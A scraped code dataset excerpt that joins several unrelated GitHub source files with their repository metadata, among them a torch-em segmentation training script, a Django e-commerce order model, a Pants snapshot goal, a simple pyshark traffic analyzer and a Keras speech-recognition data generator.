final_activation=None
)
else:
print("Using vanilla model")
model = AnisotropicUNet(
scale_factors=[
[1, 2, 2],
[1, 2, 2],
[2, 2, 2],
[2, 2, 2]
],
in_channels=1,
out_channels=n_out,
initial_features=64,
gain=2,
final_activation=None
)
return model
def train_embeddings(args, datasets):
large_model = bool(args.large_model)
model = get_model(large_model)
# patch shapes:
if large_model:
# largest possible shape for A100 with mixed training and large model
# patch_shape = [32, 320, 320]
patch_shape = [32, 256, 256]
else:
# largest possible shape for 2080Ti with mixed training
patch_shape = [24, 192, 192]
train_sets = [f'{ds}_train' for ds in datasets]
val_sets = [f'{ds}_val' for ds in datasets]
if args.train_on_val:
train_sets += val_sets
train_loader = get_loader(
datasets=train_sets,
patch_shape=patch_shape,
n_samples=1000
)
val_loader = get_loader(
datasets=val_sets,
patch_shape=patch_shape,
n_samples=100
)
loss = torch_em.loss.ContrastiveLoss(
delta_var=.75,
delta_dist=2.,
impl='scatter'
)
tag = 'large' if large_model else 'default'
if args.train_on_val:
tag += '_train_on_val'
name = f"embedding_model_{tag}_{'_'.join(datasets)}"
trainer = torch_em.default_segmentation_trainer(
name=name,
model=model,
train_loader=train_loader,
val_loader=val_loader,
loss=loss,
metric=loss,
learning_rate=5e-5,
mixed_precision=True,
log_image_interval=50
)
if args.from_checkpoint:
trainer.fit(args.iterations, 'latest')
else:
trainer.fit(args.iterations)
def check(datasets, train=True, val=True, n_images=5):
from torch_em.util.debug import check_loader
patch_shape = [32, 256, 256]
if train:
print("Check train loader")
dsets = [f'{ds}_train' for ds in datasets]
loader = get_loader(dsets, patch_shape)
check_loader(loader, n_images)
if val:
print("Check val loader")
dsets = [f'{ds}_val' for ds in datasets]
loader = get_loader(dsets, patch_shape)
check_loader(loader, n_images)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--datasets', '-d', type=str, nargs='+', default=['human', 'rat'])
parser.add_argument('--check', '-c', type=int, default=0)
parser.add_argument('--iterations', '-i', type=int, default=int(1e5))
parser.add_argument('--large_model', '-l', type=int, default=0)
parser.add_argument('--from_checkpoint', type=int, default=0)
parser.add_argument('--train_on_val', type=int, default=0)
dataset_names = ['human', 'rat']
args = parser.parse_args()
datasets = args.datasets
datasets.sort()
assert all(ds in dataset_names for ds in datasets)
if args.check:
check(datasets, train=True, val=True)
else:
train_embeddings(args, datasets)
|
constantinpape/torch-em
|
experiments/unet-segmentation/mitochondria-segmentation/mito-em/challenge/embeddings/train_embeddings.py
|
train_embeddings.py
|
py
| 4,556 |
python
|
en
|
code
| 42 |
github-code
|
6
|
11499299532
|
import requests,json
def ranking(duration="daily",ranking_type="break",offset=0,lim=20,unit=False):
try:
resp = requests.get(f'https://w4.minecraftserver.jp/api/ranking?type={ranking_type}k&offset={offset}&lim={lim}&duration={duration}')
data_json = json.loads(resp.text)
rank_list = list(data_json["ranks"])
rank = 1
msg = ""  # ranking text accumulated in the loop below
for mcid_data in rank_list:
get_mcid = mcid_data["player"]
get_data = mcid_data["data"]
seichi_ryo = get_data["raw_data"]
name = get_mcid["name"]
if unit == True:
if len(str(seichi_ryo)) > 8:
seichi_ryo_kugiri0 = str(seichi_ryo)[-4:]
seichi_ryo_kugiri1 = str(seichi_ryo)[-8:-4]
seichi_ryo_kugiri2 = str(seichi_ryo)[:-8]
seichi_ryo = f"{seichi_ryo_kugiri2}億{seichi_ryo_kugiri1}万{seichi_ryo_kugiri0}"
elif len(str(seichi_ryo)) > 4:
seichi_ryo_kugiri0 = str(seichi_ryo)[-4:]
seichi_ryo_kugiri1 = str(seichi_ryo)[:-4]
seichi_ryo = seichi_ryo_kugiri1 + "万" + seichi_ryo_kugiri0
msg += f"{rank}位 {name} 整地量:{seichi_ryo}\n"
rank += 1
return msg
except:
text = "引数が無効または整地鯖APIが死んでます"
return text
def get_data(mcid=None,uuid=None,data_type="break",type_data_type="data"):
try:
if mcid != None:
resp = requests.get(f'https://api.mojang.com/users/profiles/minecraft/{mcid}')
data_json = json.loads(resp.text)
uuid_before = data_json["id"]
uuid = uuid_before[0:8]
uuid += "-"
uuid += uuid_before[8:12]
uuid += "-"
uuid += uuid_before[12:16]
uuid += "-"
uuid += uuid_before[16:20]
uuid += "-"
uuid += uuid_before[20:32]
print(uuid)
print(f'https://w4.minecraftserver.jp/api/ranking/player/{uuid}?types={data_type}')
resp = requests.get(f'https://w4.minecraftserver.jp/api/ranking/player/{uuid}?types={data_type}')
data_json = json.loads(resp.text)
if type_data_type == "data":
data = data_json[0]["data"]["raw_data"]
return data
if type_data_type == "lastquit":
return data_json[0]["lastquit"]
elif uuid != None:
resp = requests.get(f'https://w4.minecraftserver.jp/api/ranking/player/{uuid}?types={data_type}')
data_json = json.loads(resp.text)
if type_data_type == "data":
return data_json[0]["data"]["raw_data"]
if type_data_type == "lastquit":
return data_json[0]["lastquit"]
except:
text = "引数が無効または整地鯖APIが死んでます"
return text
# Required libraries:
# json (standard library)
# requests
# Install command:
# py -m pip install requests
# My Discord server
# https://discord.gg/Gs7VXE
# My Discord account
# neruhito#6113
# 672910471279673358
|
nekorobi-0/seichi_ranking
|
seichi_ranking.py
|
seichi_ranking.py
|
py
| 3,146 |
python
|
en
|
code
| 2 |
github-code
|
6
|
26042467106
|
from __future__ import annotations
import logging
from abc import ABCMeta
from dataclasses import dataclass
from pants.core.util_rules.environments import EnvironmentNameRequest
from pants.engine.environment import EnvironmentName
from pants.engine.fs import MergeDigests, Snapshot, Workspace
from pants.engine.goal import Goal, GoalSubsystem
from pants.engine.rules import Get, MultiGet, collect_rules, goal_rule, rule
from pants.engine.target import (
FieldSet,
NoApplicableTargetsBehavior,
TargetRootsToFieldSets,
TargetRootsToFieldSetsRequest,
)
from pants.engine.unions import UnionMembership, union
logger = logging.getLogger(__name__)
@union
class GenerateSnapshotsFieldSet(FieldSet, metaclass=ABCMeta):
"""The fields necessary to generate snapshots from a target."""
@dataclass(frozen=True)
class GenerateSnapshotsResult:
snapshot: Snapshot
@dataclass(frozen=True)
class EnvironmentAwareGenerateSnapshotsRequest:
"""Request class to request a `GenerateSnapshotsResult` in an environment-aware fashion."""
field_set: GenerateSnapshotsFieldSet
@rule
async def environment_await_generate_snapshots(
request: EnvironmentAwareGenerateSnapshotsRequest,
) -> GenerateSnapshotsResult:
environment_name = await Get(
EnvironmentName,
EnvironmentNameRequest,
EnvironmentNameRequest.from_field_set(request.field_set),
)
result = await Get(
GenerateSnapshotsResult,
{request.field_set: GenerateSnapshotsFieldSet, environment_name: EnvironmentName},
)
return result
class GenerateSnapshotsSubsystem(GoalSubsystem):
name = "generate-snapshots"
help = "Generate test snapshots."
@classmethod
def activated(cls, union_membership: UnionMembership) -> bool:
return GenerateSnapshotsFieldSet in union_membership
class GenerateSnapshots(Goal):
subsystem_cls = GenerateSnapshotsSubsystem
environment_behavior = Goal.EnvironmentBehavior.USES_ENVIRONMENTS
@goal_rule
async def generate_snapshots(workspace: Workspace) -> GenerateSnapshots:
target_roots_to_field_sets = await Get(
TargetRootsToFieldSets,
TargetRootsToFieldSetsRequest(
GenerateSnapshotsFieldSet,
goal_description=f"the `{GenerateSnapshotsSubsystem.name}` goal",
no_applicable_targets_behavior=NoApplicableTargetsBehavior.error,
),
)
if not target_roots_to_field_sets.field_sets:
return GenerateSnapshots(exit_code=0)
snapshot_results = await MultiGet(
Get(GenerateSnapshotsResult, EnvironmentAwareGenerateSnapshotsRequest(field_set))
for field_set in target_roots_to_field_sets.field_sets
)
all_snapshots = await Get(
Snapshot, MergeDigests([result.snapshot.digest for result in snapshot_results])
)
workspace.write_digest(all_snapshots.digest)
for file in all_snapshots.files:
logger.info(f"Generated {file}")
return GenerateSnapshots(exit_code=0)
def rules():
return collect_rules()
|
pantsbuild/pants
|
src/python/pants/core/goals/generate_snapshots.py
|
generate_snapshots.py
|
py
| 3,031 |
python
|
en
|
code
| 2,896 |
github-code
|
6
|
30827334271
|
import json
import os
class FileUtils:
@staticmethod
def readJsonFile(filePath):
with open(filePath, 'r', encoding='utf-8') as file:
jsonData = json.load(file)
return jsonData
@staticmethod
def writeJsonFile(filePath, jsonData):
with open(filePath, 'w', encoding='utf-8') as file:
file.write(json.dumps(jsonData, sort_keys=False, indent=4, separators=(',', ': ')))
@staticmethod
def readLinesFromFile(filePath) -> list:
with open(filePath, 'r', encoding='utf-8') as f:
return [line.replace('\n', '') for line in f.readlines()]
|
Danny0515/Portfolio-crawler
|
src/main/utils/FileUtils.py
|
FileUtils.py
|
py
| 622 |
python
|
en
|
code
| 0 |
github-code
|
6
|
29852066628
|
__author__ = "Rohit N Dubey"
from django.conf.urls import patterns, include, url
from django.contrib import admin
from views import Ignite
from . import prod
urlpatterns = patterns('',
url(r'^ui/(?P<path>.*)$', 'django.views.static.serve', { 'document_root': prod.UI_ROOT, }),
url(r'^api/pool/', include('pool.urls')),
url(r'^api/discoveryrule/', include('discoveryrule.urls')),
url(r'^api/configuration/', include('configuration.urls')),
# url(r'^api/usermanagement/', include('usermanagement.urls')),
url(r'^api/fabric/', include('fabric.urls')),
url(r'^api/resource/', include('resource.urls')),
url(r'^admin/', include(admin.site.urls)),
url(r'^auth/', include('djoser.urls')),
url(r'^api/ignite', Ignite.as_view(), name='home'),
)
|
salran40/POAP
|
ignite/urls.py
|
urls.py
|
py
| 805 |
python
|
en
|
code
| 0 |
github-code
|
6
|
9777903968
|
import math
from django.db import models
from django.db.models.signals import pre_save, post_save
from apps.addresses.models import Address
from apps.carts.models import Cart
from apps.billing.models import BillingProfile
from main.utils import unique_order_id_generator
# ORDER STATUS OPTIONS
ORDER_STATUS_CHOICES = (
# (stored value, Displayed value) #
('created', 'Created'),
('paid', 'Paid'),
('shipped', 'Shipped'),
('delivered', 'Delivered'),
('refunded', 'Refunded'),
)
class OrderManager(models.Manager):
def new_or_get(self, billing_profile, cart_obj):
created = False
# QUERY for existing order
qs = self.get_queryset().filter(billing_profile=billing_profile, cart=cart_obj, active=True, status='created')
print("QS -> ", qs)
# Found Order
if qs.count() == 1:
# created = False
# take the first (and only) matching order from the queryset
obj = qs.first()
print("FOUND -> Obj -> ", obj)
else:
# Create object instance
obj = self.model.objects.create(billing_profile=billing_profile, cart=cart_obj)
created = True
print("CREATED -> Obj -> ", obj)
return obj, created
class Order(models.Model):
billing_profile = models.ForeignKey(BillingProfile, null=True, blank=True)
shipping_address = models.ForeignKey(Address, related_name="shipping_address", null=True, blank=True)
billing_address = models.ForeignKey(Address, related_name="billing_address", null=True, blank=True)
cart = models.ForeignKey(Cart)
# pk / id -> unique, random
order_id = models.CharField(max_length=120, blank=True)
status = models.CharField(max_length=120, default='created', choices=ORDER_STATUS_CHOICES)
shipping_total = models.DecimalField(default=5.99, max_digits=7, decimal_places=2)
total = models.DecimalField(default=0.00, max_digits=7, decimal_places=2)
active = models.BooleanField(default=True)
def __str__(self):
return self.order_id
# attach Manager to Order
objects = OrderManager()
# update total instance method
def update_total(self):
# object variables
cart_total = self.cart.total
shipping_total = self.shipping_total
# Fixing data types -> (decimal, float)
new_total = math.fsum([cart_total, shipping_total])
# Format output
formatted_total = format(new_total, '.2f')
# Assign instance
self.total = formatted_total
# Save instance
self.save()
return new_total
# Method to check if the ORDER is complete
def check_done(self):
billing_profile = self.billing_profile
billing_address = self.billing_address
shipping_address = self.shipping_address
total = self.total
if billing_profile and billing_address and shipping_address and total > 0:
return True
return False
def mark_paid(self):
if self.check_done():
# Update ORDER status
self.status = "paid"
self.save()
return self.status
# GENERATE THE ORDER ID
def pre_save_create_order_id(sender, instance, *args, **kwargs):
if not instance.order_id:
instance.order_id = unique_order_id_generator(instance)
# Define Queryset --> Find any existing carts
qs = Order.objects.filter(cart=instance.cart).exclude(billing_profile=instance.billing_profile)
if qs.exists():
print("Found previous cart ... ")
# update previous carts to be in-active
qs.update(active=False)
# Connect Signal
pre_save.connect(pre_save_create_order_id, sender=Order)
# GENERATE THE ORDER TOTAL
def post_save_cart_total(sender, instance, created, *args, **kwargs):
if not created:
cart_obj = instance
cart_total = cart_obj.total
cart_id = cart_obj.id
qs = Order.objects.filter(cart__id=cart_id)
if qs.count() == 1:
order_obj = qs.first()
order_obj.update_total()
# Connect Signal
post_save.connect(post_save_cart_total, sender=Cart)
def post_save_order(sender, instance, created, *args, **kwargs):
print("Saving Order ...")
if created:
print("Updating ... Order Updated")
instance.update_total()
# Connect Signal
post_save.connect(post_save_order, sender=Order)
|
ehoversten/Ecommerce_Django
|
main/apps/orders/models.py
|
models.py
|
py
| 4,469 |
python
|
en
|
code
| 2 |
github-code
|
6
|
73100458107
|
# Network Traffic Analyzer:
# Analyze network packet captures for anomalies and threats.
# pip install pyshark
'''
Python script that reads a Wireshark PCAP file and performs basic security analysis,
such as identifying suspicious traffic, detecting port scans, and checking for potential security threats.
The script uses the pyshark library to parse the PCAP file.
'''
import pyshark
def analyze_pcap(pcap_file):
# Create a PyShark capture object
capture = pyshark.FileCapture(pcap_file)
# Initialize variables for analysis
suspicious_traffic = 0  # placeholder counter; none of the checks below increment it yet
port_scan_detected = False
# Loop through each packet in the capture file
for packet in capture:
# Very rough heuristic: flag any TCP traffic to a well-known port (< 1024) as a possible scan
if "TCP" in packet and int(packet["TCP"].dstport) < 1024:
port_scan_detected = True
# Add more checks for specific threats or anomalies as needed
# Analyze the results
if port_scan_detected:
print("Port scan detected in the network traffic.")
else:
print("No port scan detected.")
if suspicious_traffic > 0:
print(f"Detected {suspicious_traffic} suspicious packets in the network traffic.")
else:
print("No suspicious traffic detected.")
if __name__ == "__main__":
# Replace 'your_capture.pcap' with the path to your PCAP file
pcap_file_path = 'your_capture.pcap'
analyze_pcap(pcap_file_path)
|
Cnawel/greyhat-python
|
wireshark/traffice_analyzer.py
|
traffice_analyzer.py
|
py
| 1,415 |
python
|
en
|
code
| 0 |
github-code
|
6
|
41858795618
|
#############################################################################################
# A survey was carried out in five Brazilian cities to collect data on traffic accidents.  #
# The following data were obtained:                                                        #
# a) City code;                                                                            #
# b) Number of passenger vehicles (in 1999);                                               #
# c) Number of traffic accidents with victims (in 1999).                                   #
# We want to know:                                                                         #
# d) The highest and lowest accident counts and which city each belongs to;                #
# e) The average number of vehicles across the five cities combined.                       #
#############################################################################################
from datetime import date
maior = código_maior = menor = código_menor = carros = 0
for c in range(1, 6):
print('-' * 60)
# Ask for the city code
código = int(input(f'Código da {c}ª cidade: '))
# Ask for the number of passenger vehicles
veículos = int(input(f'Número de veículos de passeio (em {date.today().year - 1}): '))
# Ask for the number of traffic accidents with victims
acidentes = int(input(f'Número de acidentes de trânsito com vítimas (em {date.today().year - 1}): '))
# Track the highest and lowest accident counts and the city each belongs to
if acidentes > maior:
maior = acidentes
código_maior = código
if código_menor == 0:
menor = acidentes
código_menor = código
if acidentes < menor:
menor = acidentes
código_menor = código
# Compute the average number of vehicles across the five cities
carros += veículos
média_veículos = carros / c
print('-' * 60)
print(f"""O maior indíce de acidentes foi {maior} na cidade de código {código_maior}
O menor indíce de acidentes foi {menor} na cidade de código {código_menor}
A média de veículos nas {c} cidades foi {média_veículos}""")
|
nralex/Python
|
3-EstruturaDeRepeticao/exercício40.py
|
exercício40.py
|
py
| 2,234 |
python
|
pt
|
code
| 0 |
github-code
|
6
|
15363352723
|
# ABC095 - C
a,b,c,x,y = [int(x) for x in input().split()]
ans = 0
ans += min((a+b)*min(x,y),c*2*min(x,y))
# First, cover min(x, y) of each type: buy A+B pairs or two AB pizzas per pair, whichever is cheaper
if x == y:
print(ans)
exit()
if x > y: # record which pizza type is still short, and by how many
rest = ["x",max(x,y)-min(x,y)]
else:
rest = ["y",max(x,y)-min(x,y)]
if rest[0] == "x":
ans += min(a*rest[1],c*2*rest[1])
else:
ans += min(b*rest[1],c*2*rest[1])
print(ans)
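# Worked example (illustrative): a=1500, b=2000, c=1600, x=3, y=2.
# Covering min(x, y)=2 of each type costs min((1500+2000)*2, 1600*2*2) = 6400,
# and the remaining single A-pizza costs min(1500, 1600*2) = 1500, so ans = 7900.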
|
idylle-cynique/atcoder_problems
|
AtCoder Beginners Contest/ABC095-C.py
|
ABC095-C.py
|
py
| 513 |
python
|
en
|
code
| 0 |
github-code
|
6
|
12959904969
|
from .declarative import (
declarative,
get_declared,
get_members,
)
from .dispatch import dispatch
from .evaluate import (
evaluate,
evaluate_recursive,
evaluate_recursive_strict,
evaluate_strict,
get_callable_description,
matches,
)
from .namespace import (
EMPTY,
flatten,
flatten_items,
getattr_path,
Namespace,
setattr_path,
setdefaults_path,
)
from .refinable import (
refinable,
Refinable,
RefinableObject,
)
from .shortcut import (
class_shortcut,
get_shortcuts_by_name,
is_shortcut,
shortcut,
Shortcut,
)
from .sort_after import (
LAST,
sort_after,
)
from .with_meta import with_meta
__version__ = '5.7.0'
__all__ = [
'assert_kwargs_empty',
'class_shortcut',
'declarative',
'dispatch',
'EMPTY',
'evaluate',
'evaluate_strict',
'evaluate_recursive',
'evaluate_recursive_strict',
'filter_show_recursive',
'flatten',
'flatten_items',
'full_function_name',
'get_shortcuts_by_name',
'getattr_path',
'get_members',
'is_shortcut',
'LAST',
'matches',
'Namespace',
'remove_show_recursive',
'refinable',
'Refinable',
'RefinableObject',
'setattr_path',
'setdefaults_path',
'shortcut',
'Shortcut',
'should_show',
'sort_after',
'with_meta',
]
def should_show(item):
try:
r = item.show
except AttributeError:
try:
r = item['show']
except (TypeError, KeyError):
return True
if callable(r):
assert False, "`show` was a callable. You probably forgot to evaluate it. The callable was: {}".format(get_callable_description(r))
return r
def filter_show_recursive(item):
if isinstance(item, list):
return [filter_show_recursive(v) for v in item if should_show(v)]
if isinstance(item, dict):
# The type(item)(**{...}) construction preserves the original dict subclass
return type(item)(**{k: filter_show_recursive(v) for k, v in dict.items(item) if should_show(v)})
if isinstance(item, set):
return {filter_show_recursive(v) for v in item if should_show(v)}
return item
def remove_keys_recursive(item, keys_to_remove):
if isinstance(item, list):
return [remove_keys_recursive(v, keys_to_remove) for v in item]
if isinstance(item, set):
return {remove_keys_recursive(v, keys_to_remove) for v in item}
if isinstance(item, dict):
return {k: remove_keys_recursive(v, keys_to_remove) for k, v in dict.items(item) if k not in keys_to_remove}
return item
def remove_show_recursive(item):
return remove_keys_recursive(item, {'show'})
def assert_kwargs_empty(kwargs):
if kwargs:
import traceback
function_name = traceback.extract_stack()[-2][2]
raise TypeError('%s() got unexpected keyword arguments %s' % (function_name, ', '.join(["'%s'" % x for x in sorted(kwargs.keys())])))
def full_function_name(f):
return '%s.%s' % (f.__module__, f.__name__)
def generate_rst_docs(directory, classes, missing_objects=None): # pragma: no coverage
"""
Generate documentation for tri.declarative APIs
:param directory: directory to write the .rst files into
:param classes: list of classes to generate documentation for
:param missing_objects: tuple of objects to count as missing markers, if applicable
"""
doc_by_filename = _generate_rst_docs(classes=classes, missing_objects=missing_objects) # pragma: no mutate
for filename, doc in doc_by_filename: # pragma: no mutate
with open(directory + filename, 'w') as f2: # pragma: no mutate
f2.write(doc) # pragma: no mutate
# noinspection PyShadowingNames
def _generate_rst_docs(classes, missing_objects=None):
if missing_objects is None:
missing_objects = tuple()
import re
def docstring_param_dict(obj):
# noinspection PyShadowingNames
doc = obj.__doc__
if doc is None:
return dict(text=None, params={})
return dict(
text=doc[:doc.find(':param')].strip() if ':param' in doc else doc.strip(),
params=dict(re.findall(r":param (?P<name>\w+): (?P<text>.*)", doc))
)
def indent(levels, s):
return (' ' * levels * 4) + s.strip()
# noinspection PyShadowingNames
def get_namespace(c):
return Namespace(
{k: c.__init__.dispatch.get(k) for k, v in get_declared(c, 'refinable_members').items()})
for c in classes:
from io import StringIO
f = StringIO()
def w(levels, s):
f.write(indent(levels, s))
f.write('\n')
def section(level, title):
underline = {
0: '=',
1: '-',
2: '^',
}[level] * len(title)
w(0, title)
w(0, underline)
w(0, '')
section(0, c.__name__)
class_doc = docstring_param_dict(c)
constructor_doc = docstring_param_dict(c.__init__)
if class_doc['text']:
f.write(class_doc['text'])
w(0, '')
if constructor_doc['text']:
if class_doc['text']:
w(0, '')
f.write(constructor_doc['text'])
w(0, '')
w(0, '')
section(1, 'Refinable members')
# noinspection PyCallByClass
for refinable_, value in sorted(dict.items(get_namespace(c))):
w(0, '* `' + refinable_ + '`')
if constructor_doc['params'].get(refinable_):
w(1, constructor_doc['params'][refinable_])
w(0, '')
w(0, '')
defaults = Namespace()
for refinable_, value in sorted(get_namespace(c).items()):
if value not in (None,) + missing_objects:
defaults[refinable_] = value
if defaults:
section(2, 'Defaults')
for k, v in sorted(flatten_items(defaults)):
if v != {}:
if '<lambda>' in repr(v):
import inspect
v = inspect.getsource(v)
v = v[v.find('lambda'):]
v = v.strip().strip(',')
elif callable(v):
v = v.__module__ + '.' + v.__name__
if v == '':
v = '""'
w(0, '* `%s`' % k)
w(1, '* `%s`' % v)
w(0, '')
shortcuts = get_shortcuts_by_name(c)
if shortcuts:
section(1, 'Shortcuts')
for name, shortcut_ in sorted(shortcuts.items()):
section(2, f'`{name}`')
if shortcut_.__doc__:
doc = shortcut_.__doc__
f.write(doc.strip())
w(0, '')
w(0, '')
yield '/%s.rst' % c.__name__, f.getvalue()
|
jlubcke/tri.declarative
|
lib/tri_declarative/__init__.py
|
__init__.py
|
py
| 6,981 |
python
|
en
|
code
| 17 |
github-code
|
6
|
30886261452
|
######### import statements for sample_models.py ###########
from keras import backend as K
from keras.models import Model
from keras.layers import (BatchNormalization, Conv1D, Dense, Input,
TimeDistributed, Activation, Bidirectional, SimpleRNN, GRU, LSTM)
################################
########### import statements for train_utils.py #############
# from data_generator import AudioGenerator  # the contents of data_generator.py are pasted below, so this import is not needed
import _pickle as pickle
from keras import backend as K
from keras.models import Model
from keras.layers import (Input, Lambda, BatchNormalization)
from keras.optimizers import SGD, RMSprop
from keras.callbacks import ModelCheckpoint
import os
#####################################################
############ import and variable definitions for data_generator.py #############
import json
import numpy as np
import random
from python_speech_features import mfcc
import librosa
import scipy.io.wavfile as wav
import matplotlib.pyplot as plt
from mpl_toolkits.axes_grid1 import make_axes_locatable
from utils import calc_feat_dim, spectrogram_from_file, text_to_int_sequence
from utils import conv_output_length
RNG_SEED = 123
######################################################################
##################### all code of data_generator.py starts here ############################
class AudioGenerator():
def __init__(self, step=10, window=20, max_freq=8000, mfcc_dim=13,
minibatch_size=20, desc_file=None, spectrogram=True, max_duration=10.0,
sort_by_duration=False):
"""
Params:
step (int): Step size in milliseconds between windows (for spectrogram ONLY)
window (int): FFT window size in milliseconds (for spectrogram ONLY)
max_freq (int): Only FFT bins corresponding to frequencies between
[0, max_freq] are returned (for spectrogram ONLY)
desc_file (str, optional): Path to a JSON-line file that contains
labels and paths to the audio files. If this is None, then
load metadata right away
"""
self.feat_dim = calc_feat_dim(window, max_freq) # spectogram
self.mfcc_dim = mfcc_dim
self.feats_mean = np.zeros((self.feat_dim,))
self.feats_std = np.ones((self.feat_dim,))
self.rng = random.Random(RNG_SEED)
if desc_file is not None:
self.load_metadata_from_desc_file(desc_file)
self.step = step
self.window = window
self.max_freq = max_freq
self.cur_train_index = 0
self.cur_valid_index = 0
self.cur_test_index = 0
self.max_duration=max_duration
self.minibatch_size = minibatch_size
self.spectrogram = spectrogram
self.sort_by_duration = sort_by_duration
def get_batch(self, partition):
""" Obtain a batch of train, validation, or test data
"""
if partition == 'train':
audio_paths = self.train_audio_paths
cur_index = self.cur_train_index
texts = self.train_texts
elif partition == 'valid':
audio_paths = self.valid_audio_paths
cur_index = self.cur_valid_index
texts = self.valid_texts
elif partition == 'test':
audio_paths = self.test_audio_paths
            cur_index = self.cur_test_index
texts = self.test_texts
else:
            raise Exception("Invalid partition. "
                            "Must be train/validation/test")
features = [self.normalize(self.featurize(a)) for a in
audio_paths[cur_index:cur_index+self.minibatch_size]]
# calculate necessary sizes
max_length = max([features[i].shape[0]
for i in range(0, self.minibatch_size)])
max_string_length = max([len(texts[cur_index+i])
for i in range(0, self.minibatch_size)])
# initialize the arrays
X_data = np.zeros([self.minibatch_size, max_length,
self.feat_dim*self.spectrogram + self.mfcc_dim*(not self.spectrogram)])
labels = np.ones([self.minibatch_size, max_string_length]) * 28 # blanks
input_length = np.zeros([self.minibatch_size, 1])
label_length = np.zeros([self.minibatch_size, 1])
for i in range(0, self.minibatch_size):
# calculate X_data & input_length
feat = features[i]
input_length[i] = feat.shape[0]
X_data[i, :feat.shape[0], :] = feat
# calculate labels & label_length
label = np.array(text_to_int_sequence(texts[cur_index+i]))
labels[i, :len(label)] = label
label_length[i] = len(label)
# return the arrays
outputs = {'ctc': np.zeros([self.minibatch_size])}
inputs = {'the_input': X_data,
'the_labels': labels,
'input_length': input_length,
'label_length': label_length
}
return (inputs, outputs)
def shuffle_data_by_partition(self, partition):
""" Shuffle the training or validation data
"""
if partition == 'train':
self.train_audio_paths, self.train_durations, self.train_texts = shuffle_data(
self.train_audio_paths, self.train_durations, self.train_texts)
elif partition == 'valid':
self.valid_audio_paths, self.valid_durations, self.valid_texts = shuffle_data(
self.valid_audio_paths, self.valid_durations, self.valid_texts)
else:
raise Exception("Invalid partition. "
"Must be train/validation")
def sort_data_by_duration(self, partition):
""" Sort the training or validation sets by (increasing) duration
"""
if partition == 'train':
self.train_audio_paths, self.train_durations, self.train_texts = sort_data(
self.train_audio_paths, self.train_durations, self.train_texts)
elif partition == 'valid':
self.valid_audio_paths, self.valid_durations, self.valid_texts = sort_data(
self.valid_audio_paths, self.valid_durations, self.valid_texts)
else:
raise Exception("Invalid partition. "
"Must be train/validation")
def next_train(self):
""" Obtain a batch of training data
"""
while True:
ret = self.get_batch('train')
self.cur_train_index += self.minibatch_size
if self.cur_train_index >= len(self.train_texts) - self.minibatch_size:
self.cur_train_index = 0
self.shuffle_data_by_partition('train')
yield ret
def next_valid(self):
""" Obtain a batch of validation data
"""
while True:
ret = self.get_batch('valid')
self.cur_valid_index += self.minibatch_size
if self.cur_valid_index >= len(self.valid_texts) - self.minibatch_size:
self.cur_valid_index = 0
self.shuffle_data_by_partition('valid')
yield ret
def next_test(self):
""" Obtain a batch of test data
"""
while True:
ret = self.get_batch('test')
self.cur_test_index += self.minibatch_size
if self.cur_test_index >= len(self.test_texts) - self.minibatch_size:
self.cur_test_index = 0
yield ret
def load_train_data(self, desc_file='train_corpus.json'):
self.load_metadata_from_desc_file(desc_file, 'train')
self.fit_train()
if self.sort_by_duration:
self.sort_data_by_duration('train')
def load_validation_data(self, desc_file='valid_corpus.json'):
self.load_metadata_from_desc_file(desc_file, 'validation')
if self.sort_by_duration:
self.sort_data_by_duration('valid')
def load_test_data(self, desc_file='test_corpus.json'):
self.load_metadata_from_desc_file(desc_file, 'test')
def load_metadata_from_desc_file(self, desc_file, partition):
""" Read metadata from a JSON-line file
(possibly takes long, depending on the filesize)
Params:
desc_file (str): Path to a JSON-line file that contains labels and
paths to the audio files
partition (str): One of 'train', 'validation' or 'test'
"""
audio_paths, durations, texts = [], [], []
with open(desc_file) as json_line_file:
for line_num, json_line in enumerate(json_line_file):
try:
spec = json.loads(json_line)
if float(spec['duration']) > self.max_duration:
continue
audio_paths.append(spec['key'])
durations.append(float(spec['duration']))
texts.append(spec['text'])
except Exception as e:
# Change to (KeyError, ValueError) or
# (KeyError,json.decoder.JSONDecodeError), depending on
# json module version
print('Error reading line #{}: {}'
.format(line_num, json_line))
if partition == 'train':
self.train_audio_paths = audio_paths
self.train_audio_paths = self.train_audio_paths[:500] # changed
self.train_durations = durations
self.train_durations = self.train_durations[:500] # changed
self.train_texts = texts
self.train_texts = self.train_texts[:500] # changed
elif partition == 'validation':
self.valid_audio_paths = audio_paths
self.valid_audio_paths = self.valid_audio_paths[:50] # changed
self.valid_durations = durations
self.valid_durations = self.valid_durations[:50] # changed
self.valid_texts = texts
self.valid_texts = self.valid_texts[:50] # changed
elif partition == 'test':
self.test_audio_paths = audio_paths
self.test_durations = durations
self.test_texts = texts
else:
raise Exception("Invalid partition to load metadata. "
"Must be train/validation/test")
def fit_train(self, k_samples=100):
""" Estimate the mean and std of the features from the training set
Params:
k_samples (int): Use this number of samples for estimation
"""
k_samples = min(k_samples, len(self.train_audio_paths))
samples = self.rng.sample(self.train_audio_paths, k_samples)
feats = [self.featurize(s) for s in samples]
feats = np.vstack(feats)
self.feats_mean = np.mean(feats, axis=0)
self.feats_std = np.std(feats, axis=0)
def featurize(self, audio_clip):
""" For a given audio clip, calculate the corresponding feature
Params:
audio_clip (str): Path to the audio clip
"""
if self.spectrogram:
return spectrogram_from_file(
audio_clip, step=self.step, window=self.window,
max_freq=self.max_freq)
else:
(rate, sig) = wav.read(audio_clip)
return mfcc(sig, rate, numcep=self.mfcc_dim)
def normalize(self, feature, eps=1e-14):
""" Center a feature using the mean and std
Params:
feature (numpy.ndarray): Feature to normalize
"""
return (feature - self.feats_mean) / (self.feats_std + eps)
def shuffle_data(audio_paths, durations, texts):
""" Shuffle the data (called after making a complete pass through
training or validation data during the training process)
Params:
audio_paths (list): Paths to audio clips
durations (list): Durations of utterances for each audio clip
texts (list): Sentences uttered in each audio clip
"""
p = np.random.permutation(len(audio_paths))
audio_paths = [audio_paths[i] for i in p]
durations = [durations[i] for i in p]
texts = [texts[i] for i in p]
return audio_paths, durations, texts
def sort_data(audio_paths, durations, texts):
""" Sort the data by duration
Params:
audio_paths (list): Paths to audio clips
durations (list): Durations of utterances for each audio clip
texts (list): Sentences uttered in each audio clip
"""
p = np.argsort(durations).tolist()
audio_paths = [audio_paths[i] for i in p]
durations = [durations[i] for i in p]
texts = [texts[i] for i in p]
return audio_paths, durations, texts
def vis_train_features(index=0):
""" Visualizing the data point in the training set at the supplied index
"""
# obtain spectrogram
audio_gen = AudioGenerator(spectrogram=True)
audio_gen.load_train_data()
vis_audio_path = audio_gen.train_audio_paths[index]
